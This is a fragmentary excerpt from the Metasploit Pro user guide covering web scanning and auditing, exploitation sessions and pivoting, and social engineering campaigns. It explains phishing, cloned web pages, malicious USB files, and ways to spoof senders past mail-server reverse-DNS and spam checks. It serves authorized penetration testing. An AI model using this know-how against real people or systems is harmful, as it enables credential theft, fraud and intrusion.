A web scan is the discovery process that Metasploit Pro uses to spider web pages and applications to search for active content and forms. During a web scan, the web scanner requests links and pages and parses the HTML for data. After a web scan completes, Metasploit Pro shows you the web server used to host each URL, or web application, and the number of pages and forms that were crawled. When you configure a web scan, you should specify the maximum number of URL and page requests to control the duration of the web scan. By default, the maximum number of requests is set to 500 per web application. However, most web applications require up to 5,000 for complete site coverage. If you need more comprehensive site coverage, you should set the maximum number of requests to a value that satisfies your scan requirements. Just remember that the number of requests affects the time it takes the web scanner to complete. Additionally, you can set a limit on the amount of time that the scanner spends on each URL. You should set a time limit to reduce the scan time. Depending on the number of URLs that you are scanning, the entire web scan can be lengthy. When performing a web scan, you may need to configure the web scan configuration multiple times before you achieve the results that you want. Once the web application has been parsed, Metasploit Pro saves the data to the project. Youll be able to view the information for each web application, or URL, from the main Web Apps page.
Web Scans
296
URLs - Defines a list of URLs that the web crawler uses as a starting point. To specify a custom virtual host, prefix the name to the address and add a comma to separate name from the address. For example, use intranet,http://192.168.0.1. Maximum requests - Defines the maximum number of pages that the web crawler requests for each web page. Time limit - Defines the maximum amount of time, in minutes, that the web crawler spends on each web site. Concurrent requests - Defines the maximum number of concurrent requests that can be sent per site. HTTP user name - Defines the user name that the web crawler uses to authenticate each request. HTTP password - Defines the password that the web crawler uses to authenticate each request. HTTP cookie data - Sets the seed for the initial cookie for each request. HTTP user agent - Defines the user agent that the web crawler sends in each request.
To enable automatic authentication, you must define the HTTP username and HTTP password fields under the Advanced Web Crawler Settings on the web application scan configuration page. You can only define one user name and password combination per web scan.
298
For example, if you want to skip all URLs that contain private in the file path, you can specify */private* as the URL pattern. When the crawler encounters a URL, like http://your.domain.com/private, it skips the URL.
Define URLs - Enter the URLs that you do not want to scan or crawl. Define Wild Card Expressions - Enclose the URLpattern that you want to use between two asterisks (*). Each URLpattern must be on a new line. For example, you can specify */admin* to blacklist any URLs that contain the word admin in the URL path.
When these SSL options are enabled, the web scanner reports a vulnerability when a web server is not running over SSL. If the web server is running SSL, the web scanner checks for weak cryptographic ciphers. If weak ciphers are allowed, the web scanner reports a vulnerability against the web server.
299
4. Configure the web app scan options. Basically, you need to set a limit on the number of pages and links that the web scanner requests and the maximum amount of time that the web scanner spends on each web application. This number may need to be adjusted in subsequent scans in order to obtain the level of site coverage that you desire. Most web applications may need up to 5,000 requests. 5. Additionally, you can supply credentials that the web scanner uses to authenticate each request. 6. When you are ready to run the web app scan, click the Launch button.
300
Web Audit
A web audit is the process that identifies vulnerabilities that exist in the web application. The web scanner parses the information that was collected for the web application and uses that information to crossreference vulnerability information. A web audit can discover the following classes of issues: XSS, SQL Injection, and LFI/RFI. If a vulnerability is identified for a web application, Metasploit Pro provides the following information for the affected website:
l
Host IP Web application URL Vulnerability category Vulnerability name Vulnerability rank Vulnerability description Vulnerability method Vulnerability parameter Vulnerable form data Vulnerability proof
Maximum request/form - Determines the maximum number of requests that the web audit requests for each form. Time limit/form - Determines the maximum number of time, in minutes, that the web audit spends on each form. Instance limit/form - Determines the maximum number of unique for instances that the web audit tests. HTTP user name - Defines the user name that the web audit uses for authentication for each request. HTTP password - Defines the password that the web audit uses for authentication for each request. HTTP cookie data - Sets the seed for the initial cookie for each request. HTTP user agent - Defines the user agent that the web audit sends in each request.
Web Audit
301
Web Audit
302
Reverse - Initiates a connection from the target system to the attacker. Bind - Forces the target to open a listening port on the target system. Auto - Selects the best method for the attacker to create a connection to the target system.
303
7. In the Listener Ports field, specify the range of ports that should be used for reverse connect back payloads. 8. If you have credentials that you want to use to authenticate your HTTP requests, you can provide them in the HTTP username and HTTP password fields under the Web Application Identification Settings area. 9. From the Target Web Vulnerabilities area, select the vulnerabilities that you want to exploit. By default, all known vulnerabilities are selected for you. 10. When you are done configuring the exploitation settings, launch the attack.
304
305
306
307
308
309
310
311
Including and Excluding Report Sections E-mailing the Web Application Assessment Report Naming the Web Application Assessment Report Ordering the Vulnerabilities in the Web Application Assessment Report
312
appendices for the report. Any sections that have a marked check box will automatically be included in the report. To remove any sections, deselect the check box.
Ordering Vulnerabilities By
By default, if Metasploit Pro identifies vulnerabilities during a web application test, it will list the vulnerabilities by category in the Web Application Assessment Report. You can change the information that Metasploit Pro uses to sort the vulnerabilities. Reports can be sorted by the following information:
l
2. When the New Report form appears, click the Report type dropdown and choose Web ApplicationAssessment .
313
3. From the Web Application Assessment Report Format options, choose the format you want to use to generate the report. The most commonly used format is PDF.
4. In the Report Name field, enter the name that you want to assign to the report. This is the name that displays in on the Reports page in the Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the report name with the task number.
5. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included.
6. Click the Order vulnerabilities by dropdown and select the value you want to use to sort the vulnerabilities.
314
7. If there are any hosts that you want to explicitly include or exclude from the report, use the Included addresses andExcluded addresses field to specify the addresses of those hosts.
8. If you want to e-mail the generated report, you can select the E-mail report option and enter a comma separated list of the e-mail addresses that you want to send the report to. Note: If you choose to e-mail the report, please make sure that you have the SMTP settings configured through the Global Settings.
315
9. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation. 10. When the report generation is complete, select Reports >Show Reportsto view a list of reports stored in the project. 11. Find the report you just generated. You can either view the report directly through your browser or you can download the report and save it to a location on your system.
Application URL - The URL where the vulnerability was found. Vulnerable Host - The fully qualified domain name of the vulnerable web application. Vulnerability Category - The Metasploit web vulnerability category to which the vulnerability belongs. Metasploit web vulnerability categories include Publicly-Writable-Directory, XSS, LFI,RFI, SQLi, and Version. Vulnerability Name- The name of the identified vulnerability. Vulnerability Risk - Identifies the likelihood of the vulnerability being exploited and measures the impact that exploitation will have. The vulnerability risk can be low, medium, or high. Vulnerability Confidence - The level of certainty that the vulnerability exists. If the exploit was able to force the page to include a remote file, the confidence level will be 100%. If it was able to invoke an error, the vulnerability level will be 75%. Vulnerability Description - Provides a description of the vulnerability. Vulnerable Method - The HTML request used. Vulnerable Parameter The parameter in the request that can be used to manipulate data. Proof - Provides the data that was used to prove the existence of a vulnerability.
316
Version - TikiWiki, awstats, basilic, cacti, coppermine, joomla, mybb, oscommerce, php-xml-rpc, tikiwiki1.9.8, tikiwiki8.3, wordpress, xss CMDi - cmd, eval Publicly Writable Directory - http_put LFI - LFI RFI -RFI SQLi - sqli_blind_mysql, sqli_blind_postgres, sqli_blind, sqli XSS - XSS
Command Injection - Executes the id command on a *nix system and looks at the output in the HTTP response. Uses the output as proof text. Direct Object Reference - Uses the URL of insecurely exposed resources as proof text. Local File Inclusion - Attempts to include a file from the server's file system and searches for the contents of that file. If the content is found, it is used as proof text. PHP Code Evaluation - Uses PHP code to add two random numbers and searches for the product in the response. If the product is found, it is used as proof text, in addition to some parts of the HTTP response. Remote File Inclusion - Attempts to add a remote file to the server's file system and searches for the contents of that file. If the content is found, it is used as proof text. SQL Injection - Shows an excerpt of the error message as proof text. SQL Injection (blind variant using differential analysis) - Displays "Boolean manipulation" because there is no proof text to display. Unvalidated Redirect - Displays the response headers as proof text. XSS - Shows an excerpt of the HTML code that contains the element that was injected as proof text. CSRF - Shows the HTML for the vulnerable form as proof text. The HTML may not match the original HTML because it is sanitized before it is parsed. Publicly Writable Directory - Uploads a file that contains a random string. If the file upload is successful, the random string will be used as proof text. Unauthorized Access - Displays the URL of the insecurely exposed path as proof text.
317
Chapter 15:
Host Tags
About Host Tags on page 320 Components of a Host Tag on page 320 Host Tag Tasks on page 322
Host Tag ID
The host tag ID, or simply host tag, consists of a single word or phrase with no spaces. Use a special character, like the underscore, to separate words. For example, you cannot use nexpose hosts, but you can use nexpose_hosts.
Description
The description describes the purpose of the host tag. For example, if you use host tags to identify different subnets, you can add a description to help you understand the purpose of the subnet. An example of a description is: Tags any hosts that are part of the IT teams subnet.
320
Include in summary report - Provides information about the host in the Executive Summary section of the report. Include in report details - Provides information about the host in the Detailed Findings section of the report. Critical finding - Marks the host information as critical.
321
322
6. Enable any of the following options: Include in report summary, Include in report details, and Critical Finding.
323
4. Locate the tag you want to delete and click Remove. 5. When the confirmation window appears, click OK to delete the host tag. 6. Save the tag.
4. Search for the tag you want to use. If you need to create a tag, you can enter the tag name in the search field, and Metasploit Pro will automatically create and apply the tag.
324
2. When the Host window appears, click on the host IP address to open the host details window.
4. Under the Update Tags area, locate the tag you want to edit. 5. Edit the description and any of the tag attributes.
325
3. When the Discovery Scan window appears, click the Advanced Options button. 4. Select the tags that you want to enable for automatic tagging.
3. When the Import window appears, click the Browse to find and select the XML or ZIP file that you want to import into Metasploit Pro. 4. Under the Automatic Tagging area, find the tags that you want to enable for automatic tagging.
326
327
Chapter 16:
Sessions
About Sessions on page 329 Active Sessions on page 330 Session Tasks on page 332
About Sessions
An active session provides a connection between the target system and the attacker. Metasploit Pro opens an active session if it can gain access to the host and run a successful attack. After you gain obtain an active session, you can use the active session to take control of the target system.
About Sessions
329
Active Sessions
Metasploit Pro opens an active session on a target system if an exploit or bruteforce attack is successful. An active session enables you to interact with and run tasks against the compromised host. A session can be a Meterpreter or command shell session. The type of session that Metasploit Pro opens depends on the type of attack that the system used to obtain the session. The session type depends on the mechanism that the attacker uses to create the session and the type of environment on which the session runs. To determine a the session type, open the Sessions window and view the Type column. The Type column lists each session for the session appears. An active session enables you to take control of the session to perform tasks within the target system.
Successful exploit on *nix SSH bruteforce on *nix Telnet bruteforce on *nix Tomcat bruteforce on *nix
Active Sessions
330
Meterpreter Sessions
A Meterpreter session enables you to use VNC to gain access to the device and enables you to use a built-in file browser to upload or download sensitive information. Meterpreter shells are currently only available for Windows. Metasploit Pro opens a Meterpreter session when the following events occur:
l
Successful exploit on Windows SSH bruteforce on Windows Telnet bruteforce on Windows SMB bruteforce on Windows Tomcat bruteforce on Windows
Authentication Notes
All successful authentication results in an authentication note attached to the host and an entry in the corresponding reports. Some protocols and servers do not allow you to execute commands directly. For example, you can utilize FTP to bruteforce credentials, but after the attack finds a valid credential, you cannot run commands directly on the server. Therefore, the attacker cannot obtain a session. When a case like this occurs during a bruteforce attack or an exploit, an alert appears on the Analysis tab that indicates that the system identified a valid account, but could not create a session. If the system identifies new credential information for a particular host, you can use the credentials to authenticate the host outside Metasploit Pro.
Meterpreter Sessions
331
Session Tasks
A session task is an action that you can perform within the active session. For example, an action enables you to collect evidence, access the file system, run a command shell, and create a pivot through the compromised host.
Session Details
The session details describe information about a particular session, such as the session type and attack module that Metasploit Pro used to obtain the session. Additionally, when you view the session details for an active session, you can access the actions that available for that session. The session details for a closed session describe the event history for the session.
Proxy Pivot
A proxy pivot send attacks through the remote host and uses the remote host as a gateway over TCP/UDP. When a proxy pivot is active, discovery scans, bruteforce, and exploitation tasks source from the pivoted host. Note: Metasploit Pro does not support IPv6 addresses for pivoting.
VPN Pivot
A VPN pivot creates a type of VPN tunnel to an exploited Windows host and turns the host into a pivot point for traffic. To create a VPN pivot, Metasploit Pro creates a a hook at the kernel level of the target
Session Tasks
332
system. The hook does not create an interface on the remote system and acts as a sniffer to return all traffic that Metasploit Pro initiates. When Metasploit Pro creates a VPN Pivot, the VPN Pivot appears as a local interface, which enables you to use IP forwarding and use the interface as a gateway to the target network. However, Metasploit Pro cannot create a bridge to a network that it is already attached to because it creates a conflicting route for the target network system. Therefore, you must verify that Metasploit Pro does not have an existing direct connection to any networks that have the same IP range and netmask as the target network. Note: Metasploit Pro does not support IPv6 addresses for pivoting.
Virtual Interfaces
In order to provide VPN pivot functionality on the Windows platform, Metasploit Pro must install a new network driver. The driver, msftap.sys, creates four virtual interfaces on the installed system, which provides the ability to run up to four concurrent VPN Pivot sessions. If Metasploit Pro does not locate the virtual interfaces when MetasploitProSvc starts, Metasploit Pro automatically installs the network drivers. To reinstall or uninstall these drivers, you can use one of the batch scripts that are available. You can locate the batch scripts at: $INSTALLROOT\apps\pro\data\drivers\<arch>\. You can use the scripts to disable the VPN Pivot virtual interfaces or restore a previously removed driver.
VNC Sessions
You can use an active Meterpreter session to obtain a VNC session with the compromised system. You can either connect to the remote desktop manually or use the VNC client that is available through Metasploit Pro. The VNC client is a Java applet that you can use to remote desktop to the target system. Before you use the Java applet, install the latest Java for your platform. You can download the latest version of Java at http://www.java.com/en/download/manual.jsp. If you do not want to use the Java applet, you can use an external client, such as VNC Viewer.
Virtual Interfaces
333
4. When the confirmation window appears, click OK to continue. 5. Choose to connect manually or to use a Java applet.
File Systems
For Meterpreter sessions, you can use the Metasploit Pro interface to browse the file system on the compromised system. Additionally, you can upload, download, or delete files.
File Systems
334
Chapter 17:
Social Engineering
About Social Engineering on page 336 Social Engineering Techniques on page 338 Social Engineering Components on page 341 Social Engineering Workflow on page 342 Campaign Dashboard on page 346 Campaign Management on page 351 Reusable Campaign Resources on page 372 USB Key Campaigns on page 383 Phishing Campaigns on page 387 Social Engineering Report on page 393
336
3. Locate the browser address bar. 4. Append /campaigns to the end of the URL and press Enter. The old campaigns area appears.
337
Phishing
Phishing is a social engineering technique that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, like a financial institution. The e-mail contains a link to open a fake web page that looks nearly identical to the official site. The style, logo, and images may appear exactly as they are on the real website. If the human target fills out the web form, you can collect the information as evidence. To set up a phishing attack in Metasploit Pro, you need to create a campaign that contains the following components:
l
E-mail component - Defines the content that you want to send in the e-mail body, and the human targets that you want to receive the phishing attack. Each campaign can only contain one e-mail component. Web page component - Defines the web page path, the HTML content, and the redirect URL. The web page that you create must contain a form that a human target can use to submit information.
When you run the campaign, Metasploit Pro creates a web server on your local system to host the web page. When a human target clicks on the tracking link and visits the web page, Metasploit Pro records the visit and any information that the human target submits through the web form.
338
Client-Side Exploits
A client-side exploit attacks vulnerabilities in client software, such as web browsers, e-mail applications, and media players. In a client-side exploit, the victim must visit a malicious site in order for the exploit to run. A client-side exploit is different from a traditional exploit because it requires the victim to initiate the connection between their machine and an attacking machine. Traditional exploits, on the other hand, do not require human interaction. When a human target visits the web page that contains the exploit, a session opens on the targets machine and gives you shell access to the targets system, if the targets system is vulnerable to the exploit. Using the session, you can do things like capture screenshots, collect password files, and pivot to other areas of the network. To set up a file format or client-side exploit in Metasploit Pro, you need to create a campaign that contains the following components: E-mail component - Defines the content that you want to send in the e-mail body and the human targets that you want to receive the e-mail. You can provide a link to the web page that serves the exploit. Web page component (optional) - Sets the web page component to send a client-side exploit and defines the tracking URL, and the HTML content for the web page.
E-mail component - Attaches a file format exploit to the e-mail and defines the content that you want to send in the e-mail body, and the human targets that you want to receive the e-mail. Portable file component - Generates a file format exploit that you can store on a USB key.
Client-Side Exploits
339
Portable Files
A portable file can be used for a USB drive drop. A portable file can be a generated executable file or a file format exploit that you load onto a USB key. When a human target installs the USB drive and opens the file, a connection is created from the targets machine to the attacking machine. To create a portable file in Metasploit Pro, you need to create a campaign that contains the following component:
l
Portable file component - Generates an executable or file format exploit that you can store on a USB key.
Portable Files
340
Campaign - A logical grouping of components that you need to perform a social engineering attack. Campaign component - A building block for a social engineering campaign. A campaign component can be an e-mail, a web page, or a portable file. Template - Reusable, shell of HTML containing boilerplate that it's useful to make available across campaigns. Create and use a template to quickly generate web page or e-mail content for a campaign. Target list - A list that defines the recipients and their e-mail addresses that will receive an e-mail. The campaign sends the social engineering attack to the target list. Use CSV formatting to create a target list. The CSV file must include the following header row: email_address, first_name, last_name.
341
342
Browser Autopwn
Browser Autopwn is a module that fingerprints HTTP clients and enables you to automatically exploit them based on their browser type. When you run Browser Autopwn, a web server starts on your local system and loads it with browser exploits. This module automatically launches browser exploits against the victims machine until an exploit successfully compromises the system. When you run Browser Autopwn, a web server starts on your local system and runs a malicious site. When a victim visits the site, any applicable exploits are attempted, and if one is successful, a Meterpreter session starts and enables you to access the victims machine.
Campaign
A campaign is a logical grouping of components that you need to perform a social engineering attack. A campaign can contain only contain one e-mail component, but can have multiple web pages or portable files.
Click Tracking
Click tracking is a method of client-side testing that tracks the number of human targets that click on a link. To implement click tracking, you need to set up a web page to which you direct a human target. The web page tracks the number of visits and helps an organization identify how susceptible their infrastructure is to a real attack.
E-mail Template
An e-mail template contains predefined HTML content that you can insert into an e-mail.
Executable
An executable file that automatically runs when a human target opens the file. The executable runs a payload that creates a connection from the exploited machine back to the attacking machine.
343
Human Target
A human target is the person who receives the social engineering attack or is part of a campaign.
Phishing Attack
A phishing attack is a form of social engineering that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, like the bank. Generally, the e-mail contains a link that opens a fake web page that looks nearly identical to the official site. The style, logo, and other images may appear exactly as they are on the real website.
Portable File
A generated executable file that you can attach to an e-mail or save to a USB key. When the victim opens the file, the executable runs the payload, starts a session on the victims machine, and connects back to your machine.
Resource File
A resource file refers to a web page template, e-mail template, or target list. It is a reusable file that you can use in a campaign. Each project has its own set of resource files. The resource files are not shareable between projects.
Social Engineering
Social engineering is an attack method that uses a delivery mechanism, such as e-mail or a USB key, to either trick a victim into providing sensitive information or compromise their machine by means of an exploit.
Target List
A target list defines the targets that you want to include in the social engineering campaign. You use the target list to specify the recipients that you want to e-mail the social engineering attack.
Tracking GIF
A tracking GIF sets a browser cookie when a human target opens an e-mail.
Human Target
344
Tracking Link
A tracking link consists of a URL path to a web page and a tracking string. When a target clicks on the URL, the system sets a cookie to track the visit and any subsequent visits.
Tracking String
A tracking string is a 64 bit string that encodes the target and e-mail IDs. Campaigns use tracking strings to monitor the activity of a target.
Visit
A visit occurs when a target clicks on a link and opens the web page.
Web Template
An web template contains predefined HTML content that you can insert into a web page.
Tracking Link
345
Campaign Dashboard
The Campaign Dashboard contains the interfaces and tools that you need to set up social engineering campaigns. It provides you with access to the campaigns, target lists, and resource files that are in a project. The Campaign Dashboard is made up of the campaign tasks bar, modal windows, campaign widgets, and action links.
Configure a Campaign - Displays the campaign editor. Use the campaign editor to create new campaigns and edit existing campaigns. Manage Campaigns - Shows a list of campaigns that are currently in the project. Next to each campaign listing is a set of action links. Use these action links to edit, delete, reset, preview, and start/stop a campaign. Manage Reusable Resources- Provides a management interface for reusable campaign resources, such as e-mail templates, web page templates, target lists, and malicious files.
Campaign Dashboard
346
Campaign Widgets
A campaign widget is an icon that represents a campaign component. When you click on the campaign widget, it opens a modal window that displays the configuration form for that campaign component.
Modal Windows
A modal window is a small pop-up window that requires you to interact with it before you can go back to the main window. Typically, modal windows are used to display alerts and confirmation windows. In Metasploit Pro, modal windows guide you through the process of setting up campaign components. To exit a modal window, you must either complete the required form data, or you can click the X to exit the screen.
Action Links
An action link is an interactive link that you can click on to perform a specific task. Each campaign has a set of action links that are available for you to use. The following action links are available to each campaign:
l
Campaign Widgets
347
Preview - Generate a preview of an e-mail and web page. Reset - Reset the statistics and data in a campaign. Edit - Edit the current configuration for campaign components. Delete - Remove the campaign and its data from the project.
The following image shows the action links that are available for a campaign:
Action Links
348
Campaigns
A campaign is a logical grouping of the campaign components that you need to exploit or phish a group of people. A campaign can be comprised of the following campaign components: e-mail, web page, or portable file. The components that you add to the campaign depend on the purpose and goal of the social engineering attack.
Campaign Restrictions
The following restrictions apply to campaigns:
l
A campaign can only contain one e-mail. A campaign that you build with the canned phishing campaign can only contain one e-mail and up to two web pages. One web page is used for the landing page, and the other web page is used for the redirect page. If you need additional redirect pages, do not use the canned phishing campaign to create a campaign, use the custom campaign builder instead. Each instance of Metasploit Pro can only run one campaign at a time. Metasploit Pro does not serve images or asset files locally. If you manually create a web page, you must define fully qualified URLs.
Campaign States
A campaign state describes the current status of a campaign. At any given point in time, a campaign can be in one of the following states:
l
Unconfigured - The campaign does not contain any components. Preparing - The campaign is getting ready to run. Launchable - The campaign is ready to start. Running - The campaign is online. For campaigns that have a web page, this means that the web page is online and accessible to target machines that can reach the Metasploit instance. For campaigns that contain an e-mail, this means that Metasploit Pro has attempted to send the email to the target list through your mail server. For campaigns that contain portable files, this means that handler is ready and waiting for incoming connections from target machines.
Campaigns
349
For campaigns that have a web page, this means that the web page is no longer accessible and cannot be viewed by anyone. For campaigns that contain portable files, this means that the handler is no longer listening for incoming connections.
Campaign States
350
Campaign Management
A campaign is a grouping of components that you need to set up a social engineering attack. You create campaigns to configure and manage campaign components, such as e-mails, web pages, and portable files.
Creating a Campaign
1. From within a project, select Campaigns from the Tasks menu. The Manage Campaigns area appears. 2. Click the Configure a Campaign tab. 3. When the Configure a Campaign area appears, enter a name for the campaign in the Name field. 4. Choose one of the following setup options:
l
Phishing Campaign - Metasploit Pro automatically creates a campaign that has the necessary campaign components for a phishing attack. The canned phishing campaign contains an e-mail component and two web page components that you configure to set up the landing page and the redirect page. Custom Campaign - You manually create the campaign and add the campaign components that you need to it. A custom campaign can contain any combination of campaign components.
Now youre ready to customize the campaign. If the campaign is empty, you will need to add a component to it. For example, if you want to generate an executable to save to a USB key, you can add a portable file component.
Campaign Management
351
Running a Campaign
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that you want to run. The campaign status must be launchable for the campaign to run. A launchable status indicates that all necessary components of the campaign are configured. 3. Click the Start link.
2. When the Manage Campaigns area appears, find the campaign that you want to reset.
Running a Campaign
352
4. When the confirmation window appears, click OK to confirm that you want to reset the data in the campaign.
2. When the Manage Campaigns area appears, find the campaign that you want to edit and click the Edit link.
3. When the campaign configuration page appears, click the Add e-mail, web page, or portable file button. You can only add components to a campaign that uses the custom setup. You cannot add components to a campaign that you created with the canned phishing campaign.
353
4. Click on the campaign component that you want to add. After you add the component, the configuration page for the component appears. Follow the onscreen instructions to configure the component.
Stopping a Campaign
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that you want to stop. 3. Click the Stop link.
354
Deleting a Campaign
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that you want to delete. 3. Click the Delete button.
355
4. When the confirmation window appears, click OK to confirm that you want to permanently delete the campaign. All target lists and campaign components will be deleted from the project. You will no longer be able to view, run, or edit the campaign.
356
5. Click the Export Data button. 6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
357
Campaign Components
In a social engineering attack, there is typically a delivery tool and an attack method. To configure a delivery tool and attack method for a social engineering attack, you use campaign components. A campaign component refers to an e-mail, web page, or portable file. It is a configurable component that you use to build a social engineering campaign. Each campaign must have at least one campaign component. Most campaigns will have an e-mail component because it is the most commonly used delivery method for social engineering. In addition to the e-mail component, you can add web pages to build phishing scams or add portable files to create file attachment attacks. For example, you can set up a phishing attack with an e-mail component and a web page component. The e-mail component defines the header and content that you want to e-mail to a target list, and the web page component sets up the landing and redirect pages that the target visits.
E-mail
E-mail is the delivery tool that you use to send social engineering attacks to your target list. An e-mail defines the header and the content that you want the victim to read. To send e-mail, you must have provide Metasploit Pro with the SMTP settings to your local mail server or a cloud based mail delivery service. Metasploit Pro does not include a built-in mail transfer agent. You must have access to your own mail server. If you intend to reuse the e-mail content in other campaigns, you can create an e-mail template that predefines the content for the e-mail body. An e-mail template enables you to quickly insert content into an e-mail without having to recreate the content each time you create a campaign. After you create the e-mail template, you will be able to apply it to an e-mail in any campaign within the project. Tip: As a general best practice, you should create the e-mail component after you create a web page component. Some features that you may need access to, such as web page links, may not be available if you create the e-mail first.
E-mail Options
The following options are available for you to configure for the e-mail component:
l
Name - The name of the e-mail component. The name displays on the campaign component tab. Subject - The subject that displays in the message header and the subject line. From Address - The senders e-mail address or the display name.
Campaign Components
358
From Name - The senders name. Target List - The list of targets, or recipients, that you want to receive the e-mail.
The mail server does not perform reverse DNS lookup to verify that the IP address of the server hosting Metasploit Pro matches the domain of the e-mail address that you are trying to spoof. If the mail server performs reverse DNS lookup, the server will reject the e-mail and refuse to deliver it. The mail server does not perform restrictive checks for spam, malicious files, or any type of e-mail abuse. Basically, the mail server should use the lowest levels of protection against spam and junk mail. For example, publicly available e-mail services like Gmail, Yahoo, and Hotmail enforce extremely high levels of security and will most likely blacklist any e-mail that appears to be spam. Due to these restrictions, it is recommended that you do not use these types of e-mail services.
If the mail server is provided through an e-mail relay service, please check the terms of service for spam or bandwidth restrictions. Many of these providers will track your account to ensure that you are not using it to abuse their services. If any of your e-mail recipients flag your e-mail as spam, this will alert the provider that you may be potentially abusing their system and may cause them to blacklist your e-mail. Some relay service providers may require that you take the time to build a reputation as a legitimate e-mail sender, otherwise, many Internet Service Providers will immediately begin to flag your e-mail as spam. Since volume is typically a huge indicator of spam, you should probably keep the number of outgoing e-mails to below the relay services recommended volume.
The SMTP port used to send mail is not blocked by the server running Metasploit Pro.
No Valid Recipients
This error indicates that the domain you are trying to spoof does not match the originating IP address for a reverse DNS lookup. To workaround this issue:
359
You can disable reverse DNS lookup on the mail server. You can set up a proxy or IP address that enables the phishing e-mail to act as if it were coming from a legitimate origin.
You can lower your mail servers security level for unknown and untrusted senders, and you can lower your mail servers security level for spam. You can utilize an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill. These e-mail services provide its users the ability to configure the level of security that is enforced on outgoing mail and the ability to send bulk mail. Additionally, these e-mail relay services are more likely to reliably deliver e-mail successfully. However, before you decide to use an e-mail relay service, please check the terms of service agreement to verify that the provider will not blacklist your e-mails if they are classified as spam.
Sender E-mail Address Does Not Match with the User Account
This error most likely results from a reverse DNS lookup that determined that the IP address of the e-mail did not match the host name that it is trying to spoof. To workaround this issue:
l
You can disable reverse DNS lookup. You can set up a proxy or IP address that enables the phishing e-mail to act as if it were coming from a legitimate origin. You can set up a local SMTP server on the server that runs Metasploit Pro. On Linux machines, you can use SendMail or Postfix. You can utilize an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill.
Sender e-mail address does not match with the user account. The server refused our mail. No valid recipients.
360
Address - The fully qualified mail server address (e.g., mail.domain.com). Port - The port that the mail server runs on. Typically, SMTP runs on Port 25. Domain - The hosted domain name for your mail server (e.g., domain.com) Username - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server. Authentication - The authentication type determines the level of security and the login mechanism that is used to connect to the SMTP server.
361
Host - The fully qualified mail server address (e.g., mail.domain.com). Port - The port that SMTP runs on. Typically, SMTP runs on Port 25. Domain - The hosted domain name for your mail server (e.g., domain.com) Username - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server.
Creating an E-mail
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup. 3. Click the Add e-mail, web page, or portable file button. 4. Click the E-mail button. 5. When the e-mail configuration window appears, enter the following header information:
l
Subject - The subject that displays in the message header and the subject line. From Address - The senders e-mail address. From Name - The senders name.
6. Click the Target list dropdown and choose a target list. 7. Click Next to continue to the E-mail Content window. 8. When the E-mail Content window appears, you need to create the body for the e-mail. Choose one of the following options:
l
Insert content from a template - Click the Template dropdown menu and choose the template that you want to apply. Create your own content - Use the plain text or rich text editor to create the e-mail body. You can insert any of the custom attributes to auto-fill the e-mail with data from the target list. For example, you can use the first_name attribute to insert the human targets first name in the e-mail.
9. Click Save to save the e-mail component. At any time, you can click on the Preview tab to see a generated preview of the current e-mail.
Web Page
A web page is an HTML page that a human target can access online. The web page can be an online form that solicits information or it can be a simple message to the target that they should have not opened the link. It can also be a web page that serves an exploit or file to a human target.
Web Page
362
To design a web page, you must create the HTML code for the web page. You can create the HTML body of a web page by manually writing the HTML code or by cloning an existing web page. The easiest and recommended way to create a web page is to clone one. For example, if you want to create a spoofed website based on your companys web page, you can clone it to make a copy of the web page for your campaign. Metasploit Pro copies the HTML to the campaign, which you can edit if there are any tweaks that you want to make to the web page. The web page is assigned a URL, which is based on the web server that you configure for the campaign. This is the URL that you send to the human targets. If you plan to reuse the web page in other campaigns, you can create a web page template. A web page template contains predefined and preformatted HTML content that you can use to quickly create a web page. After you create the web page template, you will be able to apply it to a web page in any campaign within the project.
Name - The name of the web page component. Path - The URL path to the web page. Attack Type - The social engineering attack type that the web page launches, such as a phishing attack or file format exploit. Content - The HTML content for the web page. Template - Wraps the content you define in the campaign text editor with a template you have previously created. Clone Website - Clones the web page content from a website. StripJavaScript - Removes Javascript tags from the cloned HTML and prevents any scripts from running URL checking code or redirecting the human target to the real site. Set referer - Sets the HTTP referer header on the outgoing request for the cloned web page. Use this option if you want to use a page that checks referers or if you want to appear to the site administrator as a user that browsed to the website (e.g., http://www.company.com/home). Set user agent - Sets the user agent header on the outgoing request for the cloned web page. Use this option if you want to get a targeted version of a website or if you want your request to appear to come from a normal browser. Resolve relative URLs - Resolves any relative URLs to absolute URLs in the cloned HTML. Since Metasploit Pro does not serve assets or images locally, links to images and files must be absolute URLs. If you clone a website, you should enable this option so that the URLs resolve to valid links and render properly on the web page.
Web Page
363
2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup. 3. Click the Add e-mail, web page, or portable file button.
5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URLpath name. For example, if your domain is http://www.mycompany.com, and your web page name is support, then the complete URLis http://www.mycompany.com/support. 6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page. 7. Click the Attack Type dropdown and choose a social engineering attack method. 8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:
Web Page
364
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the companys website or intranet. Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.
9. Click the Next button to continue to the Web Page Content window. 10. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
l
